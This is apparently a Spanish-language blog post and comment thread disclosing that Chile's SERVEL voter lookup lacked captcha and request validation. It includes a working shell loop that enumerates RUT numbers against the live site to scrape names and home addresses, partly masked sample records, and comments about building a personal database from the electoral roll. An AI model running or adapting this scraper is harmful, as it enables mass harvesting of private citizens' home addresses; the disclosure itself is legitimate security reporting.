Luego de que se propusieran la idea de inscribir automaticamente a todos los chilenos, el SERVEL tuvo la brillante idea de poner la base de datos de todos los inscritos disponible para cualquier persona en su sitio web.
Con solo ingresar el RUT o el nombre de una persona, es posible obtener su domicilio, por ejemplo:
El formulario no cuenta con un captcha para validar que sea una persona quien consulta los datos y tampoco tiene las validaciones necesarias para proteger request desde sitios remotos y asi poder evitar que un "bot" se dedique a hacer un dump de la base de datos.
Como el sistema de consultas es vulnerable a CSRF, con un pequeño script podemos obtener información de personas, por ejemplo:
15000XXX-7 LECAROS XXXXX ELENA XXXX PILCO XX XXXXXX DPTO 106 ------------ 15000002-5 XXXXXX NIETO XXXXXXXX ANDRES SITIO XXXXXX EL SAUCE XXXXXXX ------------ 15000XXX-3 ROJAS XXXXXX PAMELA XXXXXXX PJ LOS XXXXX XX ------------ 15000XXX-1 BELLO XXXXX SUSANA XXXXXX DIEGO XXXXX XXXXX POBL. SAN JOSE ------------ 15000XXX-K GONZALEZ XXX PATRICIA XXXX ANIBAL PINTO XXXX PBL.M.ORIENTE ------------
En esta prueba de concepto lo unico que hice fue un script que cuente de 15.000.000 a 15.000.010, obtenga el digito verificador de cada RUT y consulte con cURL o wget al sitio del SERVEL. Un bot podria ser programado para que recorra todos los rut y obtenga información sobre las personas.
Comando: for seq in $(seq 15000000 15000010); do rut=$(php dv.php $seq); echo $rut; wget -O - -o /dev/null "https://www.servel.cl/consulta/consulta2012.aspx?ScriptManager1=updpnl1|btnconsultarnombre&__ASYNCPOST=true&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2FwEWBALt74KnBwKIgMLoCQLA%2BNmoBgL066iRCh5kzc0O6krAcPyF8iP14ICzZPVMch4cFobzrB8c5UMe&__VIEWSTATE=%2FwEPDwUKLTUxOTc5MjYxMg9kFgICAw9kFgICAQ9kFgJmD2QWAgITD2QWAgIDDzwrABEBARAWABYAFgBkGAEFDWdyZGR1cGxpY2Fkb3MPZ2QHQ9n6Ug6DvemNcSslF9aItsqRASRwxwtjME5L46rPQQ%3D%3D&btnconsultarnombre=Consultar&hdfl=&txtnombre=$rut"|grep 'lbldomicilio\|lblnombre'|awk -F '>' '{print $2}'|sed 's/< \/span//g'; echo "------------"; done
Script php (dv.php)
�PRE0
Actualizado
SERVEL finalmente puso un Captcha para evitar a los bots.
Ahora ya no estas avisando? ahaaha
saludos
Como tu dices, esto lleva bastantes años con lo mismo, la ultima vez lo parchearon con un captcha, es deicr, si tienen conocimiento, pero cayeron en el mismo error.
El problema es que ahora afecta a muchas personas mas, con esto de la inscripcion automatica
Ahora que la inscripción es automática, aparte de ser mas gente, es sin consentimiento =N
Para un proyecto en una fundación estamos interesados en parte de esta información (ningún dato sensible, solo el campo de locación).
O si alguien sabe si por la ley de transparencia se puede acceder a la misma, o en último caso cuál es su costo. Gracias de antemano.
de metigacion, buen material Zerial
slds
compartanla para que su precio baje a $0
estan lucrando con nuestra información
puedes descargarlas juntarlas en un solo PDF y extraer los datos con eso creas tu propia base de datos, el PDF completo pesa al rededor de 1.5 GB